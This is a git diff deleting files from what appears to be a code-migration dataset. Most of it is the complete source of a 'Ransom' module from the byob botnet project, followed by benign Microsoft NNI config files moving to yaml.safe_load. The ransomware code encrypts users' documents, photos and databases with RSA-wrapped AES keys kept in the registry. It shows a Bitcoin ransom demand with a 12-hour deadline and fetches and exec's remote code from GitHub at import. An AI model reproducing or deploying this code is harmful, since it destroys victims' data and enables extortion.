Bitcoin wallet address - - """ - try: - if os.name is 'nt': - if bitcoin_wallet: - alert = util.alert(text = "Your personal files have been encrypted. The service fee to decrypt your files is $100 USD worth of bitcoin (try www.coinbase.com or Google 'how to buy bitcoin'). Below is the temporary bitcoin wallet address created for the transfer. It expires in 12 hours from now at %s, at which point the encryption key will be deleted unless you have paid." % time.localtime(time.time() + 60 * 60 * 12)) - elif payment_url: - alert = util.alert("Your personal files have been encrypted.\nThis is your Session ID: {}\nWrite it down. Click here: {}\n and follow the instructions to decrypt your files.\nEnter session ID in the 'name' field. The decryption key will be emailed to you when payment is received.\n".format(session['id'], payment_url), "Windows Alert") - else: - return "{} missing argument(s): bitcoin_wallet, payment_url" - return "Launched a Windows Message Box with ransom payment information" - else: - return "{} does not yet support {} platform".format(request_payment.func_name, sys.platform) - except Exception as e: - return "{} error: {}".format(request_payment.func_name, str(e)) - - -def encrypt_file(filename, rsa_key): - """ - Encrypt a file with AES-256-OCB symmetric encryption - using a randomly generated key, encrypt the key - with RSA-2048 asymmetric encryption, then store the - filename and RSA-encrypted AES-key as a key in the - Windows Registry - - `Requires` - :param str filename: target filename - :param RsaKey rsa_key: 2048-bit public RSA key - - Returns True if succesful, otherwise False - """ - try: - if os.path.isfile(filename): - if os.path.splitext(filename)[1] in globals()['filetypes']: - if isinstance(rsa_key, Crypto.PublicKey.RSA.RsaKey): - cipher = Crypto.Cipher.PKCS1_OAEP.new(rsa_key) - aes_key = Crypto.Random.get_random_bytes(32) - with open(filename, 'rb') as fp: - data = fp.read() - ciphertext = security.encrypt_aes(data, aes_key) - with open(filename, 'wb') as fd: - fd.write(ciphertext) - key = base64.b64encode(cipher.encrypt(aes_key)) - util.registry_key(globals()['_registry_key'], filename, key) - util.log('{} encrypted'.format(filename)) - return True - else: - _debugger.debug("File '{}' not found".format(filename)) - except Exception as e: - _debugger.debug("{} error: {}".format(encrypt_file.func_name, str(e))) - return False - - -def decrypt_file(filename, key): - """ - Decrypt a file that was encrypted with AES-256-OCB encryption - - `Required` - :param str filename: target filename - :param str aes_key: 256-bit key - - Returns True if succesful, otherwise False - """ - try: - if os.path.isfile(filename): - with open(filename, 'rb') as fp: - ciphertext = fp.read() - plaintext = security.decrypt_aes(ciphertext, key) - with open(filename, 'wb') as fd: - fd.write(plaintext) - util.log('{} decrypted'.format(filename)) - return True - else: - _debugger.debug("File '{}' not found".format(filename)) - except Exception as e: - _debugger.debug("{} error: {}".format(decrypt_file.func_name, str(e))) - return False - - -def encrypt_files(args): - """ - Encrypt all files that are not required for the machine to function - - `Required` - :param str args: filename and RSA key separated by a space - - """ - try: - target, _, rsa_key = args.partition(' ') - if os.path.exists(target): - if not isinstance(rsa_key, Crypto.PublicKey.RSA.RsaKey): - rsa_key = Crypto.PublicKey.RSA.importKey(rsa_key) - if not rsa_key.can_encrypt(): - return "Error: RSA key cannot encrypt" - if os.path.isfile(target): - return encrypt_file(target, rsa_key) - if os.path.isdir(target): - globals()['threads']['iter-files'] = _iter_files(rsa_key, base_dir=target) - globals()['threads']['encrypt-files'] = _threader() - return "Encrypting files" - else: - return "File '{}' does not exist".format(target) - except Exception as e: - util.log("{} error: {}".format(encrypt_files.func_name, str(e))) - - -def decrypt_files(rsa_key): - """ - Decrypt all encrypted files on host machine - - `Required` - :param str rsa_key: RSA private key in PEM format - - """ - try: - if not isinstance(rsa_key, Crypto.PublicKey.RSA.RsaKey): - rsa_key = Crypto.PublicKey.RSA.importKey(rsa_key) - if not rsa_key.has_private(): - return "Error: RSA key cannot decrypt" - globals()['threads']['iter-files'] = _iter_files(rsa_key) - globals()['threads']['decrypt-files'] = _threader() - return "Decrypting files" - except Exception as e: - util.log("{} error: {}".format(decrypt_files.func_name, str(e))) - -def run(args=None): - """ - Run the ransom module - - `Required` - :param str args: encrypt, decrypt, payment - - """ - if args: - cmd, _, action = str(args).partition(' ') - if 'payment' in cmd: - return request_payment(action) - elif 'decrypt' in cmd: - return decrypt_files(action) - elif 'encrypt' in cmd: - reg_key = _winreg.CreateKey(_winreg.HKEY_CURRENT_USER, registry_key) - return encrypt_files(action) - return globals()['usage'] diff --git a/v1/data/codefile/malwaredllc@byob__9291b54__byob$modules$ransom.py.target.py b/v1/data/codefile/malwaredllc@byob__9291b54__byob$modules$ransom.py.target.py deleted file mode 100644 index 906f4bb..0000000 --- a/v1/data/codefile/malwaredllc@byob__9291b54__byob$modules$ransom.py.target.py +++ /dev/null @@ -1,239 +0,0 @@ -#!/usr/bin/python -# -*- coding: utf-8 -*- -'Ransom (Build Your Own Botnet)' - -# standard library -import os -import sys -import imp -import json -import Queue -import base64 -import urllib -import threading - -# utilities -util = imp.new_module('util') -exec compile(urllib.urlopen('https://raw.githubusercontent.com/colental/byob/master/byob/core/util.py').read(), 'https://raw.githubusercontent.com/colental/byob/master/byob/core/util.py', 'exec') in util.__dict__ -sys.modules['util'] = util - -# globals -packages = ['_winreg','Cryptodome.PublicKey.RSA','Cryptodome.Cipher.PKCS1_OAEP'] -platforms = ['win32'] -threads = {} -tasks = Queue.Queue() -filetypes = ['.pdf','.zip','.ppt','.doc','.docx','.rtf','.jpg','.jpeg','.png','.img','.gif','.mp3','.mp4','.mpeg', - '.mov','.avi','.wmv','.rtf','.txt','.html','.php','.js','.css','.odt', '.ods', '.odp', '.odm', '.odc', - '.odb', '.doc', '.docx', '.docm', '.wps', '.xls', '.xlsx', '.xlsm', '.xlsb', '.xlk', '.ppt', '.pptx', - '.pptm', '.mdb', '.accdb', '.pst', '.dwg', '.dxf', '.dxg', '.wpd', '.rtf', '.wb2', '.mdf', '.dbf', - '.psd', '.pdd', '.pdf', '.eps', '.ai', '.indd', '.cdr', '.jpe', '.jpeg','.tmp','.log','.py', - '.dng', '.3fr', '.arw', '.srf', '.sr2', '.bay', '.crw', '.cr2', '.dcr', '.rwl', '.rw2','.pyc', - '.kdc', '.erf', '.mef', '.mrw', '.nef', '.nrw', '.orf', '.raf', '.raw', '.r3d', '.ptx','.css', - '.pef', '.srw', '.x3f', '.der', '.cer', '.crt', '.pem', '.pfx', '.p12', '.p7b', '.p7c','.html', - '.css','.js','.rb','.xml','.wmi','.sh','.asp','.aspx','.plist','.sql','.vbs','.ps1','.sqlite'] -usage = 'ransom ' -description = """ -Encrypt the files on a client host machine and ransom the decryption key -back to the currently logged-in user for a payment in Bitcoin to a randomly -generated temporary wallet address that expires in 12 hours -""" - -# setup -if util.is_compatible(platforms, __name__): - util.imports(packages, globals()) - -# main -def _threader(tasks): - try: - retries = 0 - while True: - try: - method, task = tasks.get_nowait() - if callable(method): - method(task) - tasks.task_done() - except: - if retries < 3: - retries += 1 - time.sleep(1) - continue - else: - break - except Exception as e: - util.log("{} error: {}".format(_threader.func_name, str(e))) - -@util.threaded -def _iter_files(rsa_key, base_dir=None): - try: - if isinstance(rsa_key, Cryptodome.PublicKey.RSA.RsaKey): - if base_dir: - if os.path.isdir(base_dir): - return os.path.walk(base_dir, lambda _, dirname, files: [globals()['tasks'].put_nowait((encrypt_file, (os.path.join(dirname, filename), rsa_key))) for filename in files], None) - else: - util.log("Target directory '{}' not found".format(base_dir)) - else: - cipher = Cryptodome.Cipher.PKCS1_OAEP.new(rsa_key) - reg_key = _winreg.OpenKey(_winreg.HKEY_CURRENT_USER, globals()['_registry_key'], 0, _winreg.KEY_READ) - i = 0 - while True: - try: - filename, key, _ = _winreg.EnumValue(reg_key, i) - key = cipher.decrypt(base64.b64decode(key)) - globals()['tasks'].put_nowait((decrypt_file, (filename, key))) - i += 1 - except: - _winreg.CloseKey(reg_key) - break - except Exception as e: - util.log('{} error: {}'.format(_iter_files.func_name, str(e))) - - -def request_payment(bitcoin_wallet, text=None, title=None): - """ - Request ransom payment from user with a Windows alert message box - - `Required` - :param str bitcoin_wallet: a valid Bitcoin wallet address - - """ - try: - if os.name is 'nt': - if bitcoin_wallet: - alert = util.alert(text = "Your personal files have been encrypted. The service fee to decrypt your files is $100 USD worth of bitcoin (try www.coinbase.com or Google 'how to buy bitcoin'). Below is the temporary bitcoin wallet address created for the transfer. It expires in 12 hours from now at %s, at which point the encryption key will be deleted unless you have paid." % time.localtime(time.time() + 60 * 60 * 12)) - elif payment_url: - alert = util.alert("Your personal files have been encrypted.\nThis is your Session ID: {}\nWrite it down. Click here: {}\n and follow the instructions to decrypt your files.\nEnter session ID in the 'name' field. The decryption key will be emailed to you when payment is received.\n".format(session['id'], payment_url), "Windows Alert") - else: - return "{} missing argument(s): bitcoin_wallet, payment_url" - return "Launched a Windows Message Box with ransom payment information" - else: - return "{} does not yet support {} platform".format(request_payment.func_name, sys.platform) - except Exception as e: - return "{} error: {}".format(request_payment.func_name, str(e)) - - -def encrypt_file(filename, rsa_key): - """ - Encrypt a file with AES-256-OCB symmetric encryption - using a randomly generated key, encrypt the key - with RSA-2048 asymmetric encryption, then store the - filename and RSA-encrypted AES-key as a key in the - Windows Registry - - `Requires` - :param str filename: target filename - :param RsaKey rsa_key: 2048-bit public RSA key - - Returns True if succesful, otherwise False - """ - try: - if os.path.isfile(filename): - if os.path.splitext(filename)[1] in globals()['filetypes']: - if isinstance(rsa_key, Cryptodome.PublicKey.RSA.RsaKey): - cipher = Cryptodome.Cipher.PKCS1_OAEP.new(rsa_key) - aes_key = Cryptodome.Random.get_random_bytes(32) - with open(filename, 'rb') as fp: - data = fp.read() - ciphertext = security.encrypt_aes(data, aes_key) - with open(filename, 'wb') as fd: - fd.write(ciphertext) - key = base64.b64encode(cipher.encrypt(aes_key)) - util.registry_key(globals()['_registry_key'], filename, key) - util.log('{} encrypted'.format(filename)) - return True - else: - _debugger.debug("File '{}' not found".format(filename)) - except Exception as e: - _debugger.debug("{} error: {}".format(encrypt_file.func_name, str(e))) - return False - - -def decrypt_file(filename, key): - """ - Decrypt a file that was encrypted with AES-256-OCB encryption - - `Required` - :param str filename: target filename - :param str aes_key: 256-bit key - - Returns True if succesful, otherwise False - """ - try: - if os.path.isfile(filename): - with open(filename, 'rb') as fp: - ciphertext = fp.read() - plaintext = security.decrypt_aes(ciphertext, key) - with open(filename, 'wb') as fd: - fd.write(plaintext) - util.log('{} decrypted'.format(filename)) - return True - else: - _debugger.debug("File '{}' not found".format(filename)) - except Exception as e: - _debugger.debug("{} error: {}".format(decrypt_file.func_name, str(e))) - return False - - -def encrypt_files(args): - """ - Encrypt all files that are not required for the machine to function - - `Required` - :param str args: filename and RSA key separated by a space - - """ - try: - target, _, rsa_key = args.partition(' ') - if os.path.exists(target): - if not isinstance(rsa_key, Cryptodome.PublicKey.RSA.RsaKey): - rsa_key = Cryptodome.PublicKey.RSA.importKey(rsa_key) - if not rsa_key.can_encrypt(): - return "Error: RSA key cannot encrypt" - if os.path.isfile(target): - return encrypt_file(target, rsa_key) - if os.path.isdir(target): - globals()['threads']['iter-files'] = _iter_files(rsa_key, base_dir=target) - globals()['threads']['encrypt-files'] = _threader() - return "Encrypting files" - else: - return "File '{}' does not exist".format(target) - except Exception as e: - util.log("{} error: {}".format(encrypt_files.func_name, str(e))) - - -def decrypt_files(rsa_key): - """ - Decrypt all encrypted files on host machine - - `Required` - :param str rsa_key: RSA private key in PEM format - - """ - try: - if not isinstance(rsa_key, Cryptodome.PublicKey.RSA.RsaKey): - rsa_key = Cryptodome.PublicKey.RSA.importKey(rsa_key) - if not rsa_key.has_private(): - return "Error: RSA key cannot decrypt" - globals()['threads']['iter-files'] = _iter_files(rsa_key) - globals()['threads']['decrypt-files'] = _threader() - return "Decrypting files" - except Exception as e: - util.log("{} error: {}".format(decrypt_files.func_name, str(e))) - -def run(args=None): - """ - Run the ransom module - - `Required` - :param str args: encrypt, decrypt, payment - - """ - if args: - cmd, _, action = str(args).partition(' ') - if 'payment' in cmd: - return request_payment(action) - elif 'decrypt' in cmd: - return decrypt_files(action) - elif 'encrypt' in cmd: - reg_key = _winreg.CreateKey(_winreg.HKEY_CURRENT_USER, registry_key) - return encrypt_files(action) - return globals()['usage'] diff --git a/v1/data/codefile/microsoft@nni__b955ac9__nni$experiment$config$base.py.diff b/v1/data/codefile/microsoft@nni__b955ac9__nni$experiment$config$base.py.diff deleted file mode 100644 index da1727c..0000000 --- a/v1/data/codefile/microsoft@nni__b955ac9__nni$experiment$config$base.py.diff +++ /dev/null @@ -1,22 +0,0 @@ -diff --git a/nni/experiment/config/base.py b/nni/experiment/config/base.py - index 7075a83648c5364e164bf2727cccedf9ec293cbd..b955ac99a46094d2d701d447e9df07509767cc32 100644 - --- a/nni/experiment/config/base.py - +++ b/nni/experiment/config/base.py -@@ -6,7 +6,7 @@ import dataclasses - from pathlib import Path - from typing import Any, Dict, Optional, Type, TypeVar - --import ruamel.yaml as yaml -+import yaml - - from . import util - -@@ -72,7 +72,7 @@ class ConfigBase: - Load config from YAML (or JSON) file. - Keys in YAML file can either be camelCase or snake_case. - """ -- data = yaml.load(open(path), Loader=yaml.SafeLoader) -+ data = yaml.safe_load(open(path)) - if not isinstance(data, dict): - raise ValueError(f'Content of config file {path} is not a dict/object') - return cls(**data, _base_path=Path(path).parent) diff --git a/v1/data/codefile/microsoft@nni__b955ac9__nni$experiment$config$base.py.source.py b/v1/data/codefile/microsoft@nni__b955ac9__nni$experiment$config$base.py.source.py deleted file mode 100644 index 739adcb..0000000 --- a/v1/data/codefile/microsoft@nni__b955ac9__nni$experiment$config$base.py.source.py +++ /dev/null @@ -1,153 +0,0 @@ -# Copyright (c) Microsoft Corporation. -# Licensed under the MIT license. - -import copy -import dataclasses -from pathlib import Path -from typing import Any, Dict, Optional, Type, TypeVar - -import ruamel.yaml as yaml - -from . import util - -__all__ = ['ConfigBase', 'PathLike'] - -T = TypeVar('T', bound='ConfigBase') - -PathLike = util.PathLike - -def _is_missing(obj: Any) -> bool: - return isinstance(obj, type(dataclasses.MISSING)) - -class ConfigBase: - """ - Base class of config classes. - Subclass may override `_canonical_rules` and `_validation_rules`, - and `validate()` if the logic is complex. - """ - - # Rules to convert field value to canonical format. - # The key is field name. - # The value is callable `value -> canonical_value` - # It is not type-hinted so dataclass won't treat it as field - _canonical_rules = {} # type: ignore - - # Rules to validate field value. - # The key is field name. - # The value is callable `value -> valid` or `value -> (valid, error_message)` - # The rule will be called with canonical format and is only called when `value` is not None. - # `error_message` is used when `valid` is False. - # It will be prepended with class name and field name in exception message. - _validation_rules = {} # type: ignore - - def __init__(self, *, _base_path: Optional[Path] = None, **kwargs): - """ - Initialize a config object and set some fields. - Name of keyword arguments can either be snake_case or camelCase. - They will be converted to snake_case automatically. - If a field is missing and don't have default value, it will be set to `dataclasses.MISSING`. - """ - if 'basepath' in kwargs: - _base_path = kwargs.pop('basepath') - kwargs = {util.case_insensitive(key): value for key, value in kwargs.items()} - if _base_path is None: - _base_path = Path() - for field in dataclasses.fields(self): - value = kwargs.pop(util.case_insensitive(field.name), field.default) - if value is not None and not _is_missing(value): - # relative paths loaded from config file are not relative to pwd - if 'Path' in str(field.type): - value = Path(value).expanduser() - if not value.is_absolute(): - value = _base_path / value - setattr(self, field.name, value) - if kwargs: - cls = type(self).__name__ - fields = ', '.join(kwargs.keys()) - raise ValueError(f'{cls}: Unrecognized fields {fields}') - - @classmethod - def load(cls: Type[T], path: PathLike) -> T: - """ - Load config from YAML (or JSON) file. - Keys in YAML file can either be camelCase or snake_case. - """ - data = yaml.load(open(path), Loader=yaml.SafeLoader) - if not isinstance(data, dict): - raise ValueError(f'Content of config file {path} is not a dict/object') - return cls(**data, _base_path=Path(path).parent) - - def json(self) -> Dict[str, Any]: - """ - Convert config to JSON object. - The keys of returned object will be camelCase. - """ - self.validate() - return dataclasses.asdict( - self.canonical(), - dict_factory=lambda items: dict((util.camel_case(k), v) for k, v in items if v is not None) - ) - - def canonical(self: T) -> T: - """ - Returns a deep copy, where the fields supporting multiple formats are converted to the canonical format. - Noticeably, relative path may be converted to absolute path. - """ - ret = copy.deepcopy(self) - for field in dataclasses.fields(ret): - key, value = field.name, getattr(ret, field.name) - rule = ret._canonical_rules.get(key) - if rule is not None: - setattr(ret, key, rule(value)) - elif isinstance(value, ConfigBase): - setattr(ret, key, value.canonical()) - # value will be copied twice, should not be a performance issue anyway - elif isinstance(value, Path): - setattr(ret, key, str(value)) - return ret - - def validate(self) -> None: - """ - Validate the config object and raise Exception if it's ill-formed. - """ - class_name = type(self).__name__ - config = self.canonical() - - for field in dataclasses.fields(config): - key, value = field.name, getattr(config, field.name) - - # check existence - if _is_missing(value): - raise ValueError(f'{class_name}: {key} is not set') - - # check type (TODO) - type_name = str(field.type).replace('typing.', '') - optional = any([ - type_name.startswith('Optional['), - type_name.startswith('Union[') and 'NoneType' in type_name, - type_name == 'Any' - ]) - if value is None: - if optional: - continue - else: - raise ValueError(f'{class_name}: {key} cannot be None') - - # check value - rule = config._validation_rules.get(key) - if rule is not None: - try: - result = rule(value) - except Exception: - raise ValueError(f'{class_name}: {key} has bad value {repr(value)}') - - if isinstance(result, bool): - if not result: - raise ValueError(f'{class_name}: {key} ({repr(value)}) is out of range') - else: - if not result[0]: - raise ValueError(f'{class_name}: {key} {result[1]}') - - # check nested config - if isinstance(value, ConfigBase): - value.validate() diff --git a/v1/data/codefile/microsoft@nni__b955ac9__nni$experiment$config$base.py.target.py b/v1/data/codefile/microsoft@nni__b955ac9__nni$experiment$config$base.py.target.py deleted file mode 100644 index ac7b602..0000000 --- a/v1/data/codefile/microsoft@nni__b955ac9__nni$experiment$config$base.py.target.py +++ /dev/null @@ -1,153 +0,0 @@ -# Copyright (c) Microsoft Corporation. -# Licensed under the MIT license. - -import copy -import dataclasses -from pathlib import Path -from typing import Any, Dict, Optional, Type, TypeVar - -import yaml - -from . import util - -__all__ = ['ConfigBase', 'PathLike'] - -T = TypeVar('T', bound='ConfigBase') - -PathLike = util.PathLike - -def _is_missing(obj: Any) -> bool: - return isinstance(obj, type(dataclasses.MISSING)) - -class ConfigBase: - """ - Base class of config classes. - Subclass may override `_canonical_rules` and `_validation_rules`, - and `validate()` if the logic is complex. - """ - - # Rules to convert field value to canonical format. - # The key is field name. - # The value is callable `value -> canonical_value` - # It is not type-hinted so dataclass won't treat it as field - _canonical_rules = {} # type: ignore - - # Rules to validate field value. - # The key is field name. - # The value is callable `value -> valid` or `value -> (valid, error_message)` - # The rule will be called with canonical format and is only called when `value` is not None. - # `error_message` is used when `valid` is False. - # It will be prepended with class name and field name in exception message. - _validation_rules = {} # type: ignore - - def __init__(self, *, _base_path: Optional[Path] = None, **kwargs): - """ - Initialize a config object and set some fields. - Name of keyword arguments can either be snake_case or camelCase. - They will be converted to snake_case automatically. - If a field is missing and don't have default value, it will be set to `dataclasses.MISSING`. - """ - if 'basepath' in kwargs: - _base_path = kwargs.pop('basepath') - kwargs = {util.case_insensitive(key): value for key, value in kwargs.items()} - if _base_path is None: - _base_path = Path() - for field in dataclasses.fields(self): - value = kwargs.pop(util.case_insensitive(field.name), field.default) - if value is not None and not _is_missing(value): - # relative paths loaded from config file are not relative to pwd - if 'Path' in str(field.type): - value = Path(value).expanduser() - if not value.is_absolute(): - value = _base_path / value - setattr(self, field.name, value) - if kwargs: - cls = type(self).__name__ - fields = ', '.join(kwargs.keys()) - raise ValueError(f'{cls}: Unrecognized fields {fields}') - - @classmethod - def load(cls: Type[T], path: PathLike) -> T: - """ - Load config from YAML (or JSON) file. - Keys in YAML file can either be camelCase or snake_case. - """ - data = yaml.safe_load(open(path)) - if not isinstance(data, dict): - raise ValueError(f'Content of config file {path} is not a dict/object') - return cls(**data, _base_path=Path(path).parent) - - def json(self) -> Dict[str, Any]: - """ - Convert config to JSON object. - The keys of returned object will be camelCase. - """ - self.validate() - return dataclasses.asdict( - self.canonical(), - dict_factory=lambda items: dict((util.camel_case(k), v) for k, v in items if v is not None) - ) - - def canonical(self: T) -> T: - """ - Returns a deep copy, where the fields supporting multiple formats are converted to the canonical format. - Noticeably, relative path may be converted to absolute path. - """ - ret = copy.deepcopy(self) - for field in dataclasses.fields(ret): - key, value = field.name, getattr(ret, field.name) - rule = ret._canonical_rules.get(key) - if rule is not None: - setattr(ret, key, rule(value)) - elif isinstance(value, ConfigBase): - setattr(ret, key, value.canonical()) - # value will be copied twice, should not be a performance issue anyway - elif isinstance(value, Path): - setattr(ret, key, str(value)) - return ret - - def validate(self) -> None: - """ - Validate the config object and raise Exception if it's ill-formed. - """ - class_name = type(self).__name__ - config = self.canonical() - - for field in dataclasses.fields(config): - key, value = field.name, getattr(config, field.name) - - # check existence - if _is_missing(value): - raise ValueError(f'{class_name}: {key} is not set') - - # check type (TODO) - type_name = str(field.type).replace('typing.', '') - optional = any([ - type_name.startswith('Optional['), - type_name.startswith('Union[') and 'NoneType' in type_name, - type_name == 'Any' - ]) - if value is None: - if optional: - continue - else: - raise ValueError(f'{class_name}: {key} cannot be None') - - # check value - rule = config._validation_rules.get(key) - if rule is not None: - try: - result = rule(value) - except Exception: - raise ValueError(f'{class_name}: {key} has bad value {repr(value)}') - - if isinstance(result, bool): - if not result: - raise ValueError(f'{class_name}: {key} ({repr(value)}) is out of range') - else: - if not result[0]: - raise ValueError(f'{class_name}: {key} {result[1]}') - - # check nested config - if isinstance(value, ConfigBase): - value.validate() diff --git a/v1/data/codefile/microsoft@nni__b955ac9__nni$experiment$config$common.py.diff b/v1/data/codefile/microsoft@nni__b955ac9__nni$experiment$config$common.py.diff deleted file mode 100644 index 9d0b9ee..0000000 --- a/v1/data/codefile/microsoft@nni__b955ac9__nni$experiment$config$common.py.diff +++ /dev/null @@ -1,22 +0,0 @@ -diff --git a/nni/experiment/config/common.py b/nni/experiment/config/common.py - index 7075a83648c5364e164bf2727cccedf9ec293cbd..b955ac99a46094d2d701d447e9df07509767cc32 100644 - --- a/nni/experiment/config/common.py - +++ b/nni/experiment/config/common.py -@@ -5,7 +5,7 @@ from dataclasses import dataclass - from pathlib import Path - from typing import Any, Dict, List, Optional, Union - --from ruamel.yaml import YAML -+import yaml - - from .base import ConfigBase, PathLike - from . import util -@@ -118,7 +118,7 @@ class ExperimentConfig(ConfigBase): - def json(self) -> Dict[str, Any]: - obj = super().json() - if obj.get('searchSpaceFile'): -- obj['searchSpace'] = YAML().load(open(obj.pop('searchSpaceFile'))) -+ obj['searchSpace'] = yaml.safe_load(open(obj.pop('searchSpaceFile'))) - return obj - - ## End of public API ## diff --git a/v1/data/codefile/microsoft@nni__b955ac9__nni$experiment$config$common.py.source.py b/v1/data/codefile/microsoft@nni__b955ac9__nni$experiment$config$common.py.source.py deleted file mode 100644 index 7143a85..0000000 --- a/v1/data/codefile/microsoft@nni__b955ac9__nni$experiment$config$common.py.source.py +++ /dev/null @@ -1,189 +0,0 @@ -# Copyright (c) Microsoft Corporation. -# Licensed under the MIT license. - -from dataclasses import dataclass -from pathlib import Path -from typing import Any, Dict, List, Optional, Union - -from ruamel.yaml import YAML - -from .base import ConfigBase, PathLike -from . import util - -__all__ = [ - 'ExperimentConfig', - 'AlgorithmConfig', - 'CustomAlgorithmConfig', - 'TrainingServiceConfig', -] - - -@dataclass(init=False) -class _AlgorithmConfig(ConfigBase): - name: Optional[str] = None - class_name: Optional[str] = None - code_directory: Optional[PathLike] = None - class_args: Optional[Dict[str, Any]] = None - - def validate(self): - super().validate() - _validate_algo(self) - -@dataclass(init=False) -class AlgorithmConfig(_AlgorithmConfig): - name: str - class_args: Optional[Dict[str, Any]] = None - -@dataclass(init=False) -class CustomAlgorithmConfig(_AlgorithmConfig): - class_name: str - class_directory: Optional[PathLike] = '.' - class_args: Optional[Dict[str, Any]] = None - - -class TrainingServiceConfig(ConfigBase): - platform: str - -class SharedStorageConfig(ConfigBase): - storage_type: str - local_mount_point: str - remote_mount_point: str - local_mounted: str - - -@dataclass(init=False) -class ExperimentConfig(ConfigBase): - experiment_name: Optional[str] = None - search_space_file: Optional[PathLike] = None - search_space: Any = None - trial_command: str - trial_code_directory: PathLike = '.' - trial_concurrency: int - trial_gpu_number: Optional[int] = None # TODO: in openpai cannot be None - max_experiment_duration: Optional[str] = None - max_trial_number: Optional[int] = None - nni_manager_ip: Optional[str] = None - use_annotation: bool = False - debug: bool = False - log_level: Optional[str] = None - experiment_working_directory: PathLike = '~/nni-experiments' - tuner_gpu_indices: Optional[Union[List[int], str]] = None - tuner: Optional[_AlgorithmConfig] = None - assessor: Optional[_AlgorithmConfig] = None - advisor: Optional[_AlgorithmConfig] = None - training_service: Union[TrainingServiceConfig, List[TrainingServiceConfig]] - shared_storage: Optional[SharedStorageConfig] = None - _deprecated: Optional[Dict[str, Any]] = None - - def __init__(self, training_service_platform: Optional[Union[str, List[str]]] = None, **kwargs): - base_path = kwargs.pop('_base_path', None) - kwargs = util.case_insensitive(kwargs) - if training_service_platform is not None: - assert 'trainingservice' not in kwargs - kwargs['trainingservice'] = util.training_service_config_factory( - platform=training_service_platform, - base_path=base_path - ) - elif isinstance(kwargs.get('trainingservice'), (dict, list)): - # dict means a single training service - # list means hybrid training service - kwargs['trainingservice'] = util.training_service_config_factory( - config=kwargs['trainingservice'], - base_path=base_path - ) - else: - raise RuntimeError('Unsupported Training service configuration!') - super().__init__(_base_path=base_path, **kwargs) - for algo_type in ['tuner', 'assessor', 'advisor']: - if isinstance(kwargs.get(algo_type), dict): - setattr(self, algo_type, _AlgorithmConfig(**kwargs.pop(algo_type))) - - def canonical(self): - ret = super().canonical() - if isinstance(ret.training_service, list): - for i, ts in enumerate(ret.training_service): - ret.training_service[i] = ts.canonical() - return ret - - def validate(self, initialized_tuner: bool = False) -> None: - super().validate() - if initialized_tuner: - _validate_for_exp(self.canonical()) - else: - _validate_for_nnictl(self.canonical()) - if self.trial_gpu_number and hasattr(self.training_service, 'use_active_gpu'): - if self.training_service.use_active_gpu is None: - raise ValueError('Please set "use_active_gpu"') - - def json(self) -> Dict[str, Any]: - obj = super().json() - if obj.get('searchSpaceFile'): - obj['searchSpace'] = YAML().load(open(obj.pop('searchSpaceFile'))) - return obj - -## End of public API ## - - @property - def _canonical_rules(self): - return _canonical_rules - - @property - def _validation_rules(self): - return _validation_rules - - -_canonical_rules = { - 'search_space_file': util.canonical_path, - 'trial_code_directory': util.canonical_path, - 'max_experiment_duration': lambda value: f'{util.parse_time(value)}s' if value is not None else None, - 'experiment_working_directory': util.canonical_path, - 'tuner_gpu_indices': lambda value: [int(idx) for idx in value.split(',')] if isinstance(value, str) else value, - 'tuner': lambda config: None if config is None or config.name == '_none_' else config.canonical(), - 'assessor': lambda config: None if config is None or config.name == '_none_' else config.canonical(), - 'advisor': lambda config: None if config is None or config.name == '_none_' else config.canonical(), -} - -_validation_rules = { - 'search_space_file': lambda value: (Path(value).is_file(), f'"{value}" does not exist or is not regular file'), - 'trial_code_directory': lambda value: (Path(value).is_dir(), f'"{value}" does not exist or is not directory'), - 'trial_concurrency': lambda value: value > 0, - 'trial_gpu_number': lambda value: value >= 0, - 'max_experiment_duration': lambda value: util.parse_time(value) > 0, - 'max_trial_number': lambda value: value > 0, - 'log_level': lambda value: value in ["trace", "debug", "info", "warning", "error", "fatal"], - 'tuner_gpu_indices': lambda value: all(i >= 0 for i in value) and len(value) == len(set(value)), - 'training_service': lambda value: (type(value) is not TrainingServiceConfig, 'cannot be abstract base class') -} - -def _validate_for_exp(config: ExperimentConfig) -> None: - # validate experiment for nni.Experiment, where tuner is already initialized outside - if config.use_annotation: - raise ValueError('ExperimentConfig: annotation is not supported in this mode') - if util.count(config.search_space, config.search_space_file) != 1: - raise ValueError('ExperimentConfig: search_space and search_space_file must be set one') - if util.count(config.tuner, config.assessor, config.advisor) != 0: - raise ValueError('ExperimentConfig: tuner, assessor, and advisor must not be set in for this mode') - if config.tuner_gpu_indices is not None: - raise ValueError('ExperimentConfig: tuner_gpu_indices is not supported in this mode') - -def _validate_for_nnictl(config: ExperimentConfig) -> None: - # validate experiment for normal launching approach - if config.use_annotation: - if util.count(config.search_space, config.search_space_file) != 0: - raise ValueError('ExperimentConfig: search_space and search_space_file must not be set with annotationn') - else: - if util.count(config.search_space, config.search_space_file) != 1: - raise ValueError('ExperimentConfig: search_space and search_space_file must be set one') - if util.count(config.tuner, config.advisor) != 1: - raise ValueError('ExperimentConfig: tuner and advisor must be set one') - -def _validate_algo(algo: AlgorithmConfig) -> None: - if algo.name is None: - if algo.class_name is None: - raise ValueError('Missing algorithm name') - if algo.code_directory is not None and not Path(algo.code_directory).is_dir(): - raise ValueError(f'code_directory "{algo.code_directory}" does not exist or is not directory') - else: - if algo.class_name is not None or algo.code_directory is not None: - raise ValueError(f'When name is set for registered algorithm, class_name and code_directory cannot be used') - # TODO: verify algorithm installation and class args diff --git a/v1/data/codefile/microsoft@nni__b955ac9__nni$experiment$config$common.py.target.py b/v1/data/codefile/microsoft@nni__b955ac9__nni$experiment$config$common.py.target.py deleted file mode 100644 index 3937c16..0000000 --- a/v1/data/codefile/microsoft@nni__b955ac9__nni$experiment$config$common.py.target.py +++ /dev/null @@ -1,189 +0,0 @@ -# Copyright (c) Microsoft Corporation. -# Licensed under the MIT license. - -from dataclasses import dataclass -from pathlib import Path -from typing import Any, Dict, List, Optional, Union - -import yaml - -from .base import ConfigBase, PathLike -from . import util - -__all__ = [ - 'ExperimentConfig', - 'AlgorithmConfig', - 'CustomAlgorithmConfig', - 'TrainingServiceConfig', -] - - -@dataclass(init=False) -class _AlgorithmConfig(ConfigBase): - name: Optional[str] = None - class_name: Optional[str] = None - code_directory: Optional[PathLike] = None - class_args: Optional[Dict[str, Any]] = None - - def validate(self): - super().validate() - _validate_algo(self) - -@dataclass(init=False) -class AlgorithmConfig(_AlgorithmConfig): - name: str - class_args: Optional[Dict[str, Any]] = None - -@dataclass(init=False) -class CustomAlgorithmConfig(_AlgorithmConfig): - class_name: str - class_directory: Optional[PathLike] = '.' - class_args: Optional[Dict[str, Any]] 